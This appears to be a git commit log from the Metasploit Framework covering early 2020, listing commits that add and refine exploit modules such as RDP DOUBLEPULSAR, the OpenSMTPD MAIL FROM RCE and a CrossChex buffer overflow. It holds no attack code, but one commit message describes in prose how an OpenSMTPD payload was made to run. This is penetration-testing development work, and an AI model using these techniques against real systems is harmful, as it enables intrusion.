s1kr10s	5f7004cf7c	Remove 'HttpClient', 'Payload' and 'RHOST'; ... ... replace 'Targets' for a new option, and format 'header', as suggested in the review.	2020-02-04 14:04:23 -03:00
Adam Galway	d428e00b35	adds additional clarification and spelling changes	2020-02-04 17:02:46 +00:00
William Vu	533c2a0a9d	Land #12909 , search help if cached results empty	2020-02-04 10:31:14 -06:00
William Vu	593e391e2f	Remove redundant else	2020-02-04 10:28:54 -06:00
Metasploit	81c8a810ba	automatic module_metadata_base.json update	2020-02-04 10:28:07 -06:00
wvu-r7	dc0c0a2029	Land #12911 , beetel_netconfig_ini_bof style fix	2020-02-04 10:19:46 -06:00
William Vu	22a75c7bee	Revert "Fix style" This reverts commit `9f81aeb4ad`.	2020-02-04 10:10:46 -06:00
Adam Galway	d76546f8ee	clarifies inserted shell code's function	2020-02-04 15:14:36 +00:00
Adam Galway	671f2e9616	msfTidy: set disclosure date to proper format	2020-02-04 11:55:39 +00:00
Adam Galway	37065f5ffe	PR Changes: More Cleanup	2020-02-04 10:59:02 +00:00
Adam Galway	4fd865f3a9	PR Changes: Comments, fail_with, and cleanup	2020-02-04 10:57:41 +00:00
Auxilus	c75eab5854	show search help when args and module_search_results are empty	2020-02-04 12:14:33 +05:30
blurbdust	4474b6f6dc	fix carriage return and spaces at EOL	2020-02-03 21:54:55 -06:00
blurbdust	13e670ceb3	fix carriage return and spaces at EOL	2020-02-03 21:52:30 -06:00
Shelby Pace	772431a29e	add documentation	2020-02-03 16:25:16 -06:00
Shelby Pace	303bddbb37	add cleanup code and modified options	2020-02-03 16:24:48 -06:00
blurbdust	5f6c9a265f	Fix puts to print_error	2020-02-03 16:11:23 -06:00
Metasploit	a34ef6fc92	automatic module_metadata_base.json update	2020-02-03 14:07:28 -06:00
Spencer McIntyre	a8dc535b2a	Land #12903 , add the RDP DOUBLEPULSAR module	2020-02-03 14:58:23 -05:00
blurbdust	f3e6f562a1	add docs, fix module location	2020-02-03 13:16:53 -06:00
Adam Galway	375b13733c	cleans up contributer guide	2020-02-03 17:29:58 +00:00
William Vu	7175126319	Update title for smb_doublepulsar_rce	2020-02-03 11:19:20 -06:00
William Vu	fa6573f8e7	Note arch in supported target	2020-02-03 11:16:16 -06:00
William Vu	a3717e13f6	Unf*ck PAYLOAD being set for neutralization	2020-02-03 11:16:16 -06:00
William Vu	e12d993027	Move SMB DOPU module to match new naming scheme	2020-02-03 11:16:16 -06:00
William Vu	4ba0762089	Update module doc with service pack	2020-02-03 11:16:16 -06:00
William Vu	f49ee7c60e	Prefer exploit.rb's rand_text wrapper	2020-02-03 11:16:16 -06:00
William Vu	d64eb10b17	Update credit	2020-02-03 11:16:16 -06:00
William Vu	548529e1d4	Clean up parsing	2020-02-03 11:16:16 -06:00
William Vu	9e690414a1	Update ping response parsing with new information Found the struct that corresponds to the ping response!	2020-02-03 11:16:16 -06:00
William Vu	6241555531	Fix service pack	2020-02-03 11:16:16 -06:00
William Vu	3074e5bece	Update module doc once more	2020-02-03 11:16:16 -06:00
William Vu	2ce49456a7	Fix arch detection and add product type Thanks to @tsellers-r7 for testing XP and producing output to compare against. Without a 32-bit test, the architecture guess was incorrect. Additionally, product type had yet to be determined. The trailing bytes were indeed significant! Thanks, Tom!	2020-02-03 11:16:16 -06:00
William Vu	992a386ece	Use build_data_tpdu and note channelJoinConfirm	2020-02-03 11:16:16 -06:00
William Vu	4d21b0e88e	Update prints in check for visibility vprint_good should be print_warning, and most vprints should be print, even if in check, since check is critical functionality.	2020-02-03 11:16:16 -06:00
William Vu	51ab58f7c9	Add module doc	2020-02-03 11:16:16 -06:00
William Vu	7ba7221a8f	Parse ping response into version, build, and arch	2020-02-03 11:16:16 -06:00
William Vu	db1a201885	Add RDP DOUBLEPULSAR RCE module	2020-02-03 11:16:16 -06:00
Adam Galway	2ce3cb9e86	updated description	2020-02-03 17:09:56 +00:00
Shelby Pace	1ef34283eb	obtain session unreliably	2020-02-03 11:07:36 -06:00
Adam Galway	6b229177f1	Add crosschex buffer overflow exploit	2020-02-03 17:02:04 +00:00
Metasploit	fc1451303a	automatic module_metadata_base.json update	2020-02-03 08:59:57 -06:00
dwelch-r7	97f5f37344	Land #12807 , Install OpenSSH for Windows	2020-02-03 14:50:30 +00:00
blurbdust	47b3e9cd94	Add new post module for CVE-2019-18988 https://whynotsecurity.com/blog/teamviewer/	2020-02-03 00:15:24 -06:00
RageLtMan	e2d0d8f011	Cleanup module and permit alternate payload scheme The original Qualys exploit uses an inline-shell for loop to read and thereby consume lines from the input stream preceeding the intended script for execution in the body section. Payloads which do not contain bad characters (encoded or coincidentally simple) can be placed directly into the FROM field and executed in place of the original for loop filter.	2020-02-01 15:04:22 -05:00
Brendan Coles	34621c0adc	Add Windscribe WindscribeService Named Pipe Privilege Escalation	2020-02-01 00:41:07 +00:00
Shelby Pace	8d4637a42b	can now add printers	2020-01-31 15:07:56 -06:00
tperry-r7	3ffc79aa85	Land #12878 , msftidy_docs Land #12878, msftidy_docs	2020-01-31 11:59:50 -06:00
RageLtMan	312a3466ee	Update 2020-7247 to execute from body Using method from https://www.openwall.com/lists/oss-security/2020/01/28/3 Attempted several other line readers via awk, while, for. Tried without pipes or `>` in the strings. It appears other characters are also illegal (conditional brackets likely culprits). Initial testing on wide-open-configured opensmtpd on OpenBSD 6.6 libvirt Vagrant image produces shells, python meterpreter sessions, and executes generic commands.	2020-01-31 04:32:03 -05:00
h00die	7ee4d28751	Land #12706 , apache userdir docs	2020-01-30 13:48:56 -05:00
h00die	b9b6b64f0c	cleanup apache userdir docs	2020-01-30 13:48:09 -05:00
Metasploit	2a6409a1bc	Bump version of framework to 5.0.73	2020-01-30 12:04:05 -06:00
Shelby Pace	b05fe7453f	add improved check method	2020-01-30 11:40:24 -06:00
William Vu	81b8d5b58a	Add OpenSMTPD MAIL FROM RCE	2020-01-29 05:10:43 -06:00
h00die	bd48588fd5	catch false positive spaces at eol from code indent	2020-01-28 14:28:18 -05:00
s1kr10s	63612e9647	Add documentation for CVE-2019-20215 exploit	2020-01-28 16:21:34 -03:00
s1kr10s	8e0e21d337	Exploit for CVE-2019-20215 Staged, uses meterpreter	2020-01-28 16:15:24 -03:00
Shelby Pace	2414fda288	add initial check/metadata	2020-01-24 16:14:51 -06:00
h00die	0c13102432	long lines ok in code blocks	2020-01-22 21:08:32 -05:00
h00die	a099481f66	fix logic bug and chmod +x	2020-01-22 19:24:01 -05:00
William Vu	2fc1eb10a8	Add verification steps to module doc	2020-01-22 17:16:41 -06:00
William Vu	10a5e9292e	Add description header to module doc	2020-01-22 17:08:26 -06:00
William Vu	88b72e6f2e	Update module doc to new standard	2020-01-22 16:48:23 -06:00
h00die	322b3f8a8b	msftidy_docs first add	2020-01-22 17:39:48 -05:00
bluesentinelsec	5d7c50e3ed	updated to use Msf::Post::Windows::Powershell mixin	2020-01-19 19:51:44 -05:00
William Vu	972cb545f0	Restore the original PLUGIN_FILE contents	2020-01-18 14:57:41 -06:00
William Vu	cbd949927d	Add WordPress InfiniteWP Client plugin exploit	2020-01-17 20:12:21 -06:00
William Vu	f5c36ffd92	Add methods we'll use to the WordPress mixin	2020-01-17 20:04:23 -06:00
John Kollross	18b0c3b246	Update apache_userdir_enum.md	2020-01-16 23:15:03 -06:00
bluesentinelsec	7eeb8c33eb	Added new post exploitation module: 'Install OpenSSH for Windows'	2020-01-09 19:58:31 -05:00
John Kollross	9a0c1331ec	Update apache_userdir_enum.md	2019-12-10 20:59:54 -06:00
John Kollross	6533cb877f	Update apache_userdir_enum.md	2019-12-10 20:58:25 -06:00
John Kollross	d314226745	Update apache_userdir_enum documentation	2019-12-10 20:58:14 -06:00
John Kollross	97b6b858e8	Update apache_userdir_enum.md	2019-11-22 07:01:42 -06:00
John Kollross	566807b20a	Create apache_userdir_enum.md	2019-11-22 07:01:05 -06:00
John Kollross	12fb919fee	Merge pull request #1 from rapid7/master update	2019-11-08 10:36:45 -06:00